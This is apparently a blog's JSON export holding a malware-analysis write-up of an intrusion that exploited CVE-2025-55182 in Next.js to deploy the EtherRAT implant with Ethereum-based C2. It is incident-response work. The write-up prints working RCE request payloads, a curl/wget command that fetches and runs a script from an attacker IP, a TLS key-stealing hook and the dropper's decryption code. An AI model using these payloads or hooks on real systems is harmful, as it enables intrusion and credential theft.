[{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/investigations/","section":"","summary":"","title":"","type":"investigations"},{"content":"","date":"April 16, 
2026","externalUrl":null,"permalink":"/tags/aes/","section":"Tags","summary":"","title":"AES","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/blockchain/","section":"Tags","summary":"","title":"Blockchain","type":"tags"},{"content":"Current focus: ELK SIEM · Executable analysis\nGitHub · LinkedIn\n","date":"April 16, 2026","externalUrl":null,"permalink":"/","section":"Bubka","summary":"Current focus: ELK SIEM · Executable analysis\nGitHub · LinkedIn\n","title":"Bubka","type":"page"},{"content":" TL;DR # On February 10th, 2026, an attacker targeted the Maromalix web application, beginning with an Nmap decoy scan to mask their true IP. They exploited CVE-2025-55182. The initial payload downloaded a bash script (s.sh) that installed a local Node.js environment, deployed a TLS keylogger to sniff outbound traffic, and dropped an AES-256 encrypted blob. A Stage 2 JavaScript dropper decrypted this blob into EtherRAT, a sophisticated Stage 3 implant. EtherRAT uses Ethereum smart contracts as a blockchain-based C2 resolver. After querying the primary and fallback contracts via public RPC nodes, the malware resolved its active C2 to a fallback IP (63.176.62.199). The attacker then initiated an automated post-exploitation sequence: collecting host telemetry, exfiltrating AWS/SSH/Kube credentials, establishing persistence via five different OS mechanisms, planting an SSH backdoor, and finally updating the server\u0026rsquo;s Next.js version to patch the vulnerability and secure their access.\nStage 0: Initial Access # Nmap Scan # I started by identifying possible port scanning activity. I used the display filter tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 0, which isolates SYN scan packets.\nIn the screenshot, we can see many different IP addresses scanning various ports on host 172.31.44.238. This is most likely an Nmap scan with the -D (decoy) parameter: Nmap sends extra packets with spoofed source IP addresses. 
The target receives a flood of scan requests from various sources, making the actual IP address look like just another \u0026ldquo;random\u0026rdquo; entry in a sea of traffic.\nLooking at the conversations, I observed a whole group of addresses from different subnets, confirming the use of decoys.\nExploitation # I shifted my focus to the HTTP traffic and noticed that host 63.180.69.24 was connecting to the web server using the python-requests/2.31.0 library.\nAt 18:36, the same host started sending POST requests to the /login, /register, /contact, /checkout, /profile, and /dashboard pages with a test payload: [{\u0026quot;id\u0026quot;:\u0026quot;test\u0026quot;}].\nThen they sent a specialized payload to the /login page, which immediately caused a 500 Internal Server Error. The command they successfully injected and ran was id.\n{\n  \u0026#34;then\u0026#34;: \u0026#34;$1:__proto__:then\u0026#34;,\n  \u0026#34;status\u0026#34;: \u0026#34;resolved_model\u0026#34;,\n  \u0026#34;reason\u0026#34;: -1,\n  \u0026#34;value\u0026#34;: \u0026#34;{\\\u0026#34;then\\\u0026#34;: \\\u0026#34;$B0\\\u0026#34;}\u0026#34;,\n  \u0026#34;_response\u0026#34;: {\n    \u0026#34;_prefix\u0026#34;: \u0026#34;var res = process.mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;id\u0026#39;,{\u0026#39;timeout\u0026#39;:300000}).toString().trim(); throw Object.assign(new Error(\u0026#39;NEXT_REDIRECT\u0026#39;), {digest:`${res}`});\u0026#34;,\n    \u0026#34;_formData\u0026#34;: {\n      \u0026#34;get\u0026#34;: \u0026#34;$1:constructor:constructor\u0026#34;\n    }\n  }\n}\nThey used Node\u0026rsquo;s internal child_process module to execute a shell command directly on the server. 
The 500 error response leaked the output of the id command back to the attacker.\nThis exploitation chain is a direct signature of CVE-2025-55182.\nCVE-2025-55182 # CVE-2025-55182 is a critical (10/10) unsafe deserialization vulnerability in React Server Components (RSCs) that allows unauthenticated remote code execution via a single HTTP request. The vulnerability exists in the requireModule function within the react-server-dom-webpack package. It affects React 19.x and frameworks built on it, including Next.js 15.x and 16.x when using the App Router.\nAfter verifying execution, the attacker sent another payload forcing the server to download and execute a script named s.sh from their infrastructure (63.176.62.199).\n{\n  \u0026#34;then\u0026#34;: \u0026#34;$1:__proto__:then\u0026#34;,\n  \u0026#34;status\u0026#34;: \u0026#34;resolved_model\u0026#34;,\n  \u0026#34;reason\u0026#34;: -1,\n  \u0026#34;value\u0026#34;: \u0026#34;{\\\u0026#34;then\\\u0026#34;: \\\u0026#34;$B0\\\u0026#34;}\u0026#34;,\n  \u0026#34;_response\u0026#34;: {\n    \u0026#34;_prefix\u0026#34;: \u0026#34;var res = process.mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;while :; do (curl -sk https://63.176.62.199:443/s.sh -o ./s.sh 2\u0026gt;/dev/null || wget -qO ./s.sh https://63.176.62.199:443/s.sh --no-check-certificate 2\u0026gt;/dev/null) \u0026amp;\u0026amp; [ -s ./s.sh ] \u0026amp;\u0026amp; chmod +x ./s.sh \u0026amp;\u0026amp; (nohup ./s.sh \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 \u0026amp;) \u0026amp;\u0026amp; break; sleep 300; done\u0026#39;,{\u0026#39;timeout\u0026#39;:300000}).toString().trim(); throw Object.assign(new Error(\u0026#39;NEXT_REDIRECT\u0026#39;), {digest:`${res}`});\u0026#34;,\n    \u0026#34;_formData\u0026#34;: {\n      \u0026#34;get\u0026#34;: \u0026#34;$1:constructor:constructor\u0026#34;\n    }\n  }\n}\nThe injected shell loop retries the download (curl, falling back to wget, with certificate checks disabled) every 300 seconds until a non-empty s.sh is fetched, then launches it in the background with nohup.\nStage 1: Shell Script Deployment # s.sh analysis # The downloaded script starts by defining specific operational directories and downloading a 
self-contained Node.js binary:\nMALWARE_DIR=\u0026#34;$HOME/.local/share/.05bf0e9b\u0026#34;\nNODE_DIR=\u0026#34;$MALWARE_DIR/.4dai8ovb\u0026#34;\nNODE_VERSION=\u0026#34;v20.11.0\u0026#34;\nNODE_URL=\u0026#34;https://nodejs.org/dist/${NODE_VERSION}/node-${NODE_VERSION}-linux-x64.tar.xz\u0026#34;\n\nmkdir -p \u0026#34;$MALWARE_DIR\u0026#34; \u0026#34;$NODE_DIR\u0026#34; 2\u0026gt;/dev/null\ncd \u0026#34;$MALWARE_DIR\u0026#34; || exit 1\n\nif [ ! -f \u0026#34;$NODE_DIR/node\u0026#34; ]; then\n  # downloads and unpacks Node.js\nfi\n# ...[snip]...\nWe can see the malware resides in the hidden \u0026quot;$HOME/.local/share/.05bf0e9b\u0026quot; folder. It downloads its own Node.js runtime (v20.11.0) into \u0026quot;$HOME/.local/share/.05bf0e9b/.4dai8ovb\u0026quot; to ensure payload compatibility regardless of the victim\u0026rsquo;s environment.\nTLS Keylogger # After setting up the environment, it creates a /tmp/.font-unix folder where it stores a .fontconfig file. This is a malicious TLS keylogger (sniffer).\nmkdir -p /tmp/.font-unix 2\u0026gt;/dev/null\n\n# Keylog preload script - hooks ALL TLS connections\ncat \u0026gt; /tmp/.font-unix/.fontconfig \u0026lt;\u0026lt; \u0026#39;FCEOF\u0026#39;\nconst fs = require(\u0026#39;fs\u0026#39;),\n  tls = require(\u0026#39;tls\u0026#39;),\n  p = \u0026#39;/tmp/.font-unix/.cache\u0026#39;;\nconst _c = tls.connect;\ntls.connect = function(...a) {\n  const s = _c.apply(this, a);\n  s.on(\u0026#39;keylog\u0026#39;, l =\u0026gt; fs.appendFileSync(p, l));\n  return s\n};\nconst h = require(\u0026#39;https\u0026#39;),\n  _r = h.request;\nh.request = function(...a) {\n  const r = _r.apply(this, a);\n  r.on(\u0026#39;socket\u0026#39;, s =\u0026gt; s.on \u0026amp;\u0026amp; s.on(\u0026#39;keylog\u0026#39;, l =\u0026gt; fs.appendFileSync(p, l)));\n  return r\n};\nFCEOF\nIt acts as an inline TLS session key extractor. 
By overriding Node.js\u0026rsquo;s native tls.connect and https.request functions, it intercepts all outbound encrypted connections made by the server. It captures the SSL/TLS master secrets exposed through the keylog event and appends them to a hidden file (/tmp/.font-unix/.cache). This allows the attacker to decrypt any secure communications originating from the compromised machine.\nFinally, the script drops a massive encrypted blob into $HOME/.local/share/.05bf0e9b/.1d5j6rm2mg2d.\ncat \u0026gt; \u0026#34;$MALWARE_DIR/.1d5j6rm2mg2d\u0026#34; \u0026lt;\u0026lt; \u0026#39;BLOB_END\u0026#39;\n2HVnlpRxwJyMF00X9WjlS...\nBLOB_END\nStage 2: JavaScript Dropper # The next part of the bash script writes and executes a Stage 2 JS dropper (.kxnzl4mtez.js). This dropper is responsible for decrypting the previous blob into the .7vfgycfd01.js payload. It uses AES-256 in CBC mode with a hardcoded key (a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5) and IV (d4e5f6a7b8c9d0e1); both are used as raw ASCII bytes (32 and 16 bytes respectively), and the blob is base64-decoded before decryption.\ncat \u0026gt; \u0026#34;$MALWARE_DIR/.kxnzl4mtez.js\u0026#34; \u0026lt;\u0026lt; \u0026#39;DROP_END\u0026#39;\n// ============================================\n// STAGE 2: JS DROPPER\n// Filename on victim: .kxnzl4mtez.js\n// ============================================\n\nconst MALWARE_DIR = path.join(require(\u0026#39;os\u0026#39;).homedir(), \u0026#39;.local\u0026#39;, \u0026#39;share\u0026#39;, \u0026#39;.05bf0e9b\u0026#39;);\nconst ENCRYPTED_BLOB = path.join(MALWARE_DIR, \u0026#39;.1d5j6rm2mg2d\u0026#39;);\nconst DECRYPTED_IMPLANT = path.join(MALWARE_DIR, \u0026#39;.7vfgycfd01.js\u0026#39;);\nconst NODE_BINARY = path.join(MALWARE_DIR, \u0026#39;.4dai8ovb\u0026#39;, \u0026#39;node\u0026#39;);\n\nconst ALGORITHM = \u0026#39;aes-256-cbc\u0026#39;;\nconst KEY = \u0026#39;a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5\u0026#39;;\nconst IV = \u0026#39;d4e5f6a7b8c9d0e1\u0026#39;;\n\nfunction decrypt(encryptedData) {\n  const key = Buffer.from(KEY, \u0026#39;utf8\u0026#39;);\n  const iv = Buffer.from(IV, \u0026#39;utf8\u0026#39;);\n
  const decipher = crypto.createDecipheriv(ALGORITHM, key, iv);\n  let decrypted = decipher.update(encryptedData, \u0026#39;base64\u0026#39;, \u0026#39;utf8\u0026#39;);\n  decrypted += decipher.final(\u0026#39;utf8\u0026#39;);\n\n  return decrypted;\n}\n\nfunction main() {\n  try {\n    if (fs.existsSync(DECRYPTED_IMPLANT)) {\n      execute();\n      return;\n    }\n\n    if (!fs.existsSync(ENCRYPTED_BLOB)) {\n      process.exit(1);\n    }\n\n    const encrypted = fs.readFileSync(ENCRYPTED_BLOB, \u0026#39;utf8\u0026#39;);\n    const decrypted = decrypt(encrypted);\n    fs.writeFileSync(DECRYPTED_IMPLANT, decrypted, { mode: 0o700 });\n\n    execute();\n  } catch (e) {\n    //...[snip]...\n  }\n}\n\nfunction execute() {\n  //...[snip]...\n}\n\nmain();\nDROP_END\nI recreated the decryption routine using the hardcoded key/IV and successfully retrieved the Stage 3 script.\nStage 3: The Main Implant # Blockchain-Based C2 # The decrypted script contains header comments identifying it as EtherRAT.\nThis is a highly evasive implant that uses a blockchain-based command and control architecture via Ethereum smart contracts. Instead of hardcoding a traditional URL, it connects to a smart contract on the Ethereum mainnet. It essentially asks the blockchain, \u0026ldquo;Where should I send the victim right now?\u0026rdquo; The smart contract responds with the active C2 URL. This means the infrastructure is dynamically hosted on the blockchain, and the attacker can update the C2 at any time without altering the malware on the host.\nThe malware contains configurations for two smart contracts: a PRIMARY and a FALLBACK.\nContract Overview \u0026amp; OSINT # I checked the primary contract (0x22f96d61cf118efabc7c5bf3384734fad2f6ead4) on Etherscan. 
It was created on Dec-05-2025.\nLooking at the transactions, I saw multiple calls to a Set String method, confirming the attacker is actively rotating their C2 URLs.\nBy inspecting the contract\u0026rsquo;s event logs, the changes to the contract are clearly visible. The attacker updated it 9 times, cycling through unique URLs, including direct IPs and tracking links:\n- http://91.215.85.42:3000\n- http://173.249.8.102/\n- https://grabify[.]link/SEFKGU\n- https://grabify[.]link/SEFKGU?dry87932wydes/fdsgdsfdsjfkl\nThe fallback contract configuration in the code contains a larger list of potential C2 endpoints, including:\n- https://15.116.46.18:443\n- https://63.176.62.199:443\n- https://3.78.187.211:443\n- https://3.66.227.157:443\n- https://52.59.200.147\n- https://3.78.229.44:3000\n- https://18.198.1.194:3000\n- https://63.179.143.20:3000\n- https://35.159.53.179:3000\n- https://3.125.41.44:3000\n- https://3.125.39.195:3000\n- http://91.215.85.42:3000\nEtherRAT utilizes several core functions to manage this process:\nInitialization and C2 Resolution # The script\u0026rsquo;s main() function starts by checking the locale, refusing to execute on systems whose locale is one of: ru, be, kk, ky, tg, uz, hy, az, ka. It then loops through the configured contracts and calls queryContract(), which makes public RPC requests to resolve the URL.\nasync function main() {\n  // CIS locale check\n  if (checkLocale()) {\n    ///...[snip]...\n\n  // Load or create state\n  if (!loadState()) {\n    ///...[snip]...\n\n  // C2 resolution\n  let c2Url = null;\n  let contractIndex = 0;\n\n  while (!c2Url \u0026amp;\u0026amp; contractIndex \u0026lt; CONTRACTS.length) {\n    const config = CONTRACTS[contractIndex];\n    const resolvedUrl = await queryContract(config);\n    ///...[snip]...\n    if (resolvedUrl) {\n      const test = await testC2Connection(resolvedUrl);\n\n      if (test.success) {\n        ///...[snip]...
        saveState();\n      }\nOnce a URL is successfully resolved, the malware tests the connection, sends a unique BotId inside a state structure, and saves this state to $MALWARE_DIR/.a3f8b2c1d4e5.json.\nlet state: {\n  botId: null;\n  c2Url: null;\n  contractIndex: number;\n  stage: number; // starts with \u0026#34;0\u0026#34;\n  firstRun: boolean;\n}\nBeacon Loop and ABI Analysis # The main beaconing loop continuously fetches payloads from the attacker\u0026rsquo;s server and executes them, utilizing random delays to evade detection.\n// Main beacon loop\nlet failureCount = 0;\n\nwhile (true) {\n  try {\n    const response = await beacon(c2Url, state.botId);\n    failureCount = 0;\n\n    if (response.status === 200 \u0026amp;\u0026amp; response.body \u0026amp;\u0026amp; response.body.length \u0026gt; 10) {\n      const success = await executePayload(response.body, state.botId, c2Url);\n\n      if (success) {\n        await reportStage(c2Url, state.botId, state.stage);\n        state.stage++;\n        //...[snip]...\n        saveState();\n\n        if (state.stage \u0026lt; 4) {\n          const delay = randomDelay(STAGE_DELAY_MIN, STAGE_DELAY_MAX);\n          await new Promise(r =\u0026gt; setTimeout(r, delay));\n          continue;\n        }\n      }\n    } else if (response.status === 204) {\n      //...[snip]...\n\n  } catch (e) {\n    //...[snip]...\n  }\n}\nIn the code, I noticed the specific function selector used for the RPC call (const FUNC_SELECTOR = '0x7d434425';). 
Since the smart contract is deployed publicly on the blockchain, I decompiled the bytecode to view the ABI (Application Binary Interface).\nThis revealed the exact function signatures: getString(address) maps to the 0x7d434425 selector (used by the bot to read the C2), and setString(string) maps to 0x7fcaf666 (used by the attacker to update the C2).\nPost-Exploitation # Continuing with the network traffic, at 18:37 I observed the victim host (172.31.44.238) making multiple HTTP/JSON POST requests to public Ethereum RPC servers (Tenderly, Llamarpc, Flashbots) to query the smart contract for the active C2.\nOne second later, the host connected to 91.215.85.42:3000 (the URL retrieved from the primary contract). While this resulted in a 404, it successfully registered and retrieved the BotId 4ebfbc8aedf60511.\nBecause the primary C2 didn\u0026rsquo;t serve a payload, the implant rolled over to its FALLBACK contract configuration. The victim then established a secure connection to 63.176.62.199 over port 443, retrieving its subsequent stages masqueraded as .css and .png files.\nStage 0: Reconnaissance # The first payload executed was an aggressive reconnaissance script that collected host information and network interfaces and checked for the existence of AWS, Kubernetes, Docker, and Git configurations.\nThe script exfiltrated the following JSON structure back to the C2:\n{\n  \u0026#34;type\u0026#34;: \u0026#34;recon\u0026#34;,\n  \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-10T18:37:25.434Z\u0026#34;,\n  \u0026#34;botId\u0026#34;: \u0026#34;4ebfbc8aedf60511\u0026#34;,\n  \u0026#34;hostname\u0026#34;: \u0026#34;ip-172-31-44-238\u0026#34;,\n  \u0026#34;username\u0026#34;: \u0026#34;maromalix\u0026#34;,\n  \u0026#34;homedir\u0026#34;: \u0026#34;/home/maromalix\u0026#34;,\n  \u0026#34;platform\u0026#34;: \u0026#34;linux\u0026#34;,\n  \u0026#34;arch\u0026#34;: \u0026#34;x64\u0026#34;,\n  \u0026#34;release\u0026#34;: \u0026#34;6.14.0-1018-aws\u0026#34;,\n
  \u0026#34;cpus\u0026#34;: \u0026#34;Intel(R) Xeon(R) Platinum 8259CL CPU @ 2.50GHz\u0026#34;,\n  \u0026#34;cpuCount\u0026#34;: 2,\n  \u0026#34;totalMemory\u0026#34;: \u0026#34;4 GB\u0026#34;,\n  \u0026#34;freeMemory\u0026#34;: \u0026#34;3 GB\u0026#34;,\n  \u0026#34;networkInterfaces\u0026#34;: [\n    {\n      \u0026#34;name\u0026#34;: \u0026#34;ens5\u0026#34;,\n      \u0026#34;addresses\u0026#34;: [\n        \u0026#34;172.31.44.238\u0026#34;,\n        \u0026#34;fe80::456:62ff:fea4:482b\u0026#34;\n      ]\n    }\n  ],\n  \u0026#34;shell\u0026#34;: \u0026#34;/bin/bash\u0026#34;,\n  \u0026#34;lang\u0026#34;: \u0026#34;C.UTF-8\u0026#34;,\n  \u0026#34;uid\u0026#34;: 999,\n  \u0026#34;paths\u0026#34;: {\n    \u0026#34;ssh\u0026#34;: true,\n    \u0026#34;aws\u0026#34;: true,\n    \u0026#34;kube\u0026#34;: false,\n    \u0026#34;docker\u0026#34;: false,\n    \u0026#34;git\u0026#34;: false\n  }\n}\nStage 1: Sensitive File Theft # The next payload systematically searched for sensitive files (.aws/credentials, id_rsa, .env, etc.) and scanned command history for critical keywords like password, secret, api_key, and aws_access. This data was exfiltrated to a /crypto/keys endpoint.\nStage 2: Deep Persistence # The third payload firmly entrenched the malware by executing 5 distinct persistence functions:\nfunction persistSystemd() {\n  // creates a user-level systemd service with a randomized name to execute the implant\n  // on system startup and automatically restart it if it gets killed\n}\n\nfunction persistXDG() {\n  // drops a hidden .desktop file into the user\u0026#39;s autostart directory (~/.config/autostart/)\n  // to execute the payload whenever a graphical desktop session is launched\n}\n\nfunction persistCron() {\n  // injects an @reboot directive into the user\u0026#39;s crontab to silently launch\n  // the malware in the background every time the system reboots.\n
}\n\nfunction persistBashrc() {\n  // appends a \u0026#39;nohup\u0026#39; background execution command to ~/.bashrc,\n  // triggering the malware every time the user opens a new interactive bash terminal.\n}\n\nfunction persistProfile() {\n  // appends a background execution command to ~/.profile,\n  // ensuring the malware runs whenever the user logs into a new shell session.\n}\nThe success of these installations was reported back in a comprehensive JSON bundle.\n{\n  \u0026#34;type\u0026#34;: \u0026#34;persistence\u0026#34;,\n  \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-10T18:38:05.784Z\u0026#34;,\n  \u0026#34;botId\u0026#34;: \u0026#34;4ebfbc8aedf60511\u0026#34;,\n  \u0026#34;methods\u0026#34;: {\n    \u0026#34;systemd\u0026#34;: {\n      \u0026#34;success\u0026#34;: true,\n      \u0026#34;path\u0026#34;: \u0026#34;/home/maromalix/.config/systemd/user/c16a536e1a9cb42d.service\u0026#34;\n    },\n    \u0026#34;xdg\u0026#34;: {\n      \u0026#34;success\u0026#34;: true,\n      \u0026#34;path\u0026#34;: \u0026#34;/home/maromalix/.config/autostart/a5eae68533ea066c.desktop\u0026#34;\n    },\n    \u0026#34;cron\u0026#34;: {\n      \u0026#34;success\u0026#34;: true\n    },\n    \u0026#34;bashrc\u0026#34;: {\n      \u0026#34;success\u0026#34;: true\n    },\n    \u0026#34;profile\u0026#34;: {\n      \u0026#34;success\u0026#34;: true\n    }\n  }\n}\nStage 3: SSH Backdoor # To guarantee alternative administrative access, the malware installed an SSH backdoor by appending the attacker\u0026rsquo;s public RSA key to the victim\u0026rsquo;s ~/.ssh/authorized_keys file under the comment maromalix@ether_dev.\nconst ATTACKER_KEY = \u0026#39;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFkH2PJL8n1LJP+vqMkHxVMPLfr4KrMFCnV4sJnQ6L4aNLMzFPWYpKg1McV6rqXGLLPpVFGM/+gJPLEpHbKnPvxIgZ4RhdeXk+M4O/vpTMMEMPqMGF8P3VcBaLBgqE3WDREF4XGZ9OWf7L8lUCPU7Q0C4hrbJrq3NF1c+QHRZBOJpx0z5m5F7W8QK8kbKnHBHqMkMd8dQ4F1c+KKtF3I3A2LCMsALBPMcGVbZd1O9B3KWL4r2q9V6R7BwFo8h1h1x1c1x1h1F8o8k1b1w1r1p1v1o1i1e1w maromalix@ether_dev\u0026#39;;\nconst KEY_FINGERPRINT = 
\u0026#39;SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\u0026#39;;\nfunction installSSHKey() {\n  // appends the attacker\u0026#39;s public RSA key to the\n  // user\u0026#39;s ~/.ssh/authorized_keys file with maromalix@ether_dev comment\n}\n\nfunction exfil(data) {\n  // makes POST request to /BotId endpoint with results\n}\nStage 4: Interactive Shell # The attacker then dropped an interactive JSON-based shell execution module, allowing them to route arbitrary commands through the C2 and read the output.\nCovering Tracks # In a final, highly calculated move, the attacker wiped the existing Next.js installation and forcibly upgraded the server to version 15.3.9.\npwd\ngrep version /home/maromalix/app/node_modules/next/package.json | head -1\ncd /home/maromalix/app \u0026amp;\u0026amp; rm -rf node_modules .next package-lock.json \u0026amp;\u0026amp; npm install next@15.3.9 --save --legacy-peer-deps \u0026amp;\u0026amp; npm install --include=dev --legacy-peer-deps 2\u0026gt;\u0026amp;1 | tail -3\ncd /home/maromalix/app \u0026amp;\u0026amp; npm run build 2\u0026gt;\u0026amp;1 | tail -5\nBy patching the very vulnerability (CVE-2025-55182) they used to gain entry, the attacker effectively locked the door behind them, preventing competing threat actors or automated scanners from discovering and compromising their newly established foothold.\nIOCs #\nType | Value | Description\nIP | 63.180.69.24 | Source of CVE-2025-55182 exploitation\nIP | 91.215.85.42 | Primary EtherRAT C2\nIP | 63.176.62.199 | Fallback EtherRAT C2 and payload delivery server\nIP | 15.116.46.18 | Fallback EtherRAT C2\nIP | 3.78.187.211 | Fallback EtherRAT C2\nIP | 3.66.227.157 | Fallback EtherRAT C2\nIP | 52.59.200.147 | Fallback EtherRAT C2\nIP | 3.78.229.44 | Fallback EtherRAT C2\nIP | 18.198.1.194 | Fallback EtherRAT C2\nIP | 63.179.143.20 | Fallback EtherRAT C2\nIP | 35.159.53.179 | Fallback EtherRAT C2\nIP | 3.125.41.44 | Fallback EtherRAT C2\nIP | 3.125.39.195 | Fallback EtherRAT C2\nContract | 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4 | Primary Ethereum C2 Resolver Contract\nContract | 0xb0cbaA51b3D1D36e8E95F4F68dfBd47ED2eaA7a4 | Fallback Ethereum C2 Resolver Contract\nFile | s.sh | Stage 1 Bash setup and keylogger script\nFile | .kxnzl4mtez.js | Stage 2 JavaScript Dropper\nFile | .7vfgycfd01.js | Stage 3 Main EtherRAT Implant\nPath | /tmp/.font-unix/.fontconfig | Malicious TLS hook script\nPath | /tmp/.font-unix/.cache | Stolen SSL/TLS master secrets file\nKey | a3f8b2c1d4e5f6a7b8c9d0e1f2a3b4c5 | AES-256-CBC Decryption Key\nSSH Key | maromalix@ether_dev | Attacker\u0026rsquo;s unauthorized public key in authorized_keys\nAttack Timeline #\n%%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%%\ngraph TD\n  classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000;\n  classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000;\n  classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000;\n  classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000;\n  classDef c2 fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000;\n  classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000;\n  A([Attacker Infrastructure]):::default --\u003e B[Nmap SYN Decoy Scan]:::access\n  B --\u003e C[18:36 - Exploit CVE-2025-55182 via /login\u003cbr/\u003eNext.js RSC Deserialization RCE]:::access\n  subgraph Stage1 [Stage 1: Deployment]\n    C --\u003e D[curl/wget downloads s.sh\u003cbr/\u003efrom 63.176.62.199:443]:::exec\n    D --\u003e E[Creates hidden dir .05bf0e9b\u003cbr/\u003eDownloads standalone Node.js]:::exec\n    E --\u003e F[Deploys TLS Keylogger\u003cbr/\u003eHooks tls.connect to steal master secrets]:::persist\n  end\n  subgraph Stage2 [Stage 2 \u0026 3: EtherRAT]\n    F --\u003e G[.kxnzl4mtez.js drops\u003cbr/\u003eDecrypts AES blob .1d5j6rm2mg2d]:::exec\n    G --\u003e H[.7vfgycfd01.js Main Implant executes\u003cbr/\u003eChecks locale and begins C2 resolution]:::exec\n  end\n  subgraph BlockchainC2 [Blockchain C2 Resolution]\n    H --\u003e I[18:37 - RPC queries to Public Ethereum Nodes\u003cbr/\u003eReads Primary \u0026 Fallback Smart Contracts]:::c2\n    I --\u003e J[Attempts Primary 91.215.85.42:3000 -\u003e 404]:::c2\n    J --\u003e K[Resolves to Fallback 63.176.62.199:443]:::c2\n  end\n  subgraph PostExploit [Post-Exploitation \u0026 Exfiltration]\n    K --\u003e L[Downloads Recon Script\u003cbr/\u003eExfiltrates host config \u0026 AWS/SSH paths]:::exfil\n    L --\u003e M[Downloads Sensitive File Searcher\u003cbr/\u003eExfiltrates AWS, SSH, and Env secrets]:::exfil\n    M --\u003e N[Installs Deep Persistence\u003cbr/\u003esystemd, XDG, cron, bashrc, profile]:::persist\n    N --\u003e O[Installs SSH Backdoor\u003cbr/\u003emaromalix@ether_dev in authorized_keys]:::persist\n    O --\u003e P[Upgrades Next.js to 15.3.9\u003cbr/\u003ePatches CVE to lock out other attackers]:::exec\n  end\n","date":"April 16, 2026","externalUrl":null,"permalink":"/investigations/cdef-etherrat/","section":"","summary":"An attacker breached Maromalix’s public-facing web application by exploiting CVE-2025-55182 (Next.js Deserialization RCE). They deployed a multi-stage implant dubbed EtherRAT, which utilizes a blockchain-based C2 mechanism via Ethereum smart contracts to dynamically resolve infrastructure. 
The attacker exfiltrated sensitive data, established multiple persistence mechanisms, and ultimately patched the vulnerability to lock out other actors.","title":"CDEF-EtherRAT","type":"investigations"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/cve-2025-55182/","section":"Tags","summary":"","title":"CVE-2025-55182","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/ethereum/","section":"Tags","summary":"","title":"Ethereum","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/etherrat/","section":"Tags","summary":"","title":"EtherRAT","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Tags","summary":"","title":"JavaScript","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Tags","summary":"","title":"Linux","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/malware-analysis/","section":"Tags","summary":"","title":"Malware Analysis","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/network-analysis/","section":"Tags","summary":"","title":"Network Analysis","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/nmap/","section":"Tags","summary":"","title":"Nmap","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/pcap/","section":"Tags","summary":"","title":"PCAP","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/rat/","section":"Tags","summary":"","title":"RAT","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/smart-contract/","section":"Tags","summary":"","title":"Smart Contract","type":"tags"},{"content":"","date":"April 16, 
2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/tls-sniffer/","section":"Tags","summary":"","title":"TLS Sniffer","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/web-attack/","section":"Tags","summary":"","title":"Web Attack","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/wireshark/","section":"Tags","summary":"","title":"Wireshark","type":"tags"},{"content":" ","date":"April 15, 2026","externalUrl":null,"permalink":"/blue_team/","section":"","summary":"","title":"","type":"blue_team"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/aws/","section":"Tags","summary":"","title":"AWS","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/bruteforce/","section":"Tags","summary":"","title":"BruteForce","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/cloudtrail/","section":"Tags","summary":"","title":"CloudTrail","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/dfir/","section":"Tags","summary":"","title":"DFIR","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/iam/","section":"Tags","summary":"","title":"IAM","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/log-analysis/","section":"Tags","summary":"","title":"Log Analysis","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/s3/","section":"Tags","summary":"","title":"S3","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/siem/","section":"Tags","summary":"","title":"SIEM","type":"tags"},{"content":"","date":"April 15, 
